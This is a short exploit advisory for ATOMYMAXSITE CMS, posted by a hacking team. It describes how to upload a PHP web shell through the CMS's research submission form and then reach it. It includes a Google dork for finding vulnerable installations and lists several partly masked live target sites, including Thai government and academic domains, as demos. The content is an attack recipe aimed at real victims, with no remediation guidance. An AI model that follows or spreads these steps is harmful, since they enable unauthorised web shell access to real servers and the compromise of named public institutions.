####################################################### # # [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability # [+] Google Dork: "Powered by ATOMYMAXSITE" # [+] Date: 30/06/2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Vendor Homepage: http://board.maxsitepro.com # [+] Version: All Version [1.50 - 2.5] # [+] Tested on: Windows 7 # ####################################################### # # [+] Exploit: # # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add # ####################################################### # # [+] Proof: # # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add # [+] Then fill in all the information requested # [+] Now click on the Browse front of ผลงานฉบับเต็ม(Fultext) and select shell.php # [+] Now click on the button below the form to be registered # [+] http://localhost/[path]/index.php?name=research # [+] Now select the first record and click the (FullText) # [+] (FullText) = Path shell.php # ####################################################### # # [+] Demo site: # # [+] http://plan.chXn1.go.th # [+] http://tbacuXd.ac.th # [+] http://www.nitedcXpm1.net # [+] http://ict.chXon1.go.th/home/ # [+] http://www.chiXangdaocity.go.th/home # ####################################################### # # [+] Discovered By : Black.Hack3r # [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313 # [+] Home : http://www.idc-team.net # #######################################################